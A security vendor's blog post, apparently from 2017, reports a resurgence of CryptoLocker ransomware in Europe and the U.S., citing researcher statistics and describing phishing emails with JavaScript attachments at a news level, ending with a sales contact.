We all thought that evil genius Evgeniy Bogachev had retired at the Black Sea with his tens of millions of ill-gotten gains after he became the FBI’s #1 Most Wanted cybercriminal. Well, perhaps he ran out of money.
CryptoLocker is back big time. Researchers have spotted a sudden resurgence this year, specifically identifying clusters of attacks in Europe and the U.S.
For people new to the ransomware racket, Russian cybercrime gangs tend to test and debug their campaigns in Europe, and then attack America in full force. CryptoLocker is ransomware’s still very potent granddaddy, and pioneered this highly successful criminal business model in September 2013, hundreds of copycats followed
In a blog post our friend Larry Abrams from BleepingComputer wrote that the strain — also known as Torrentlocker and Teerac — started its comeback toward the end of January 2017, after being quiet the second half of 2016.
Larry pointed to stats from the ID-Ransomware website which show CryptoLocker infections jumped from a just handful to nearly 100 per day to more than 400 per day by February.
He also confirmed CryptoLocker’s recent tsunami with Microsoft’s Malware Protection Center, whose telemetry picked up on increased attacks against Europe, especially Italy. The phishing emails are designed to look secure and official because they are digitally signed, but it is all just social engineering to trick the recipient and get them to open attached .JS files that download and install CryptoLocker.
Check Point Software Technologies confirmed with SC Media that its researchers also observed a sudden rise in CryptoLocker attacks. The phishing emails attempt to trick recipients into opening a zipped HTML file. “The HTML contains JS file, which pulls a second JS file from an Amazon server, which executes the first one on memory,” said Lotem
Finklesteen, threat intelligence researcher at Check Point.
“Then, after pulling two more JS files, CryptoLocker is served to the victim machine and being executed. The vast majority of the infections we observed this week were in the U.S. The second major target was Western Europe, especially Germany,” said Finklesteen.
Ransomware as a global threat
Microsoft’s Malware Protection Center blog stated: “Ransomware proved to be a truly global threat in 2016, having been observed in more than 200 territories. In the US alone, ransomware was encountered in more than 460,000 computers or 15% of global encounters. Italy and Russia follow with 252,000 and 192,000 ransomware encounters, respectively. Korea, Spain, Germany, Australia, and France all registered more than 100,000 encounters. Here is their geographic distribution chart.
For help in stopping Ransomware in its tracks contact us today, 317-939-3282
[contentblock id=72 img=gcb.png]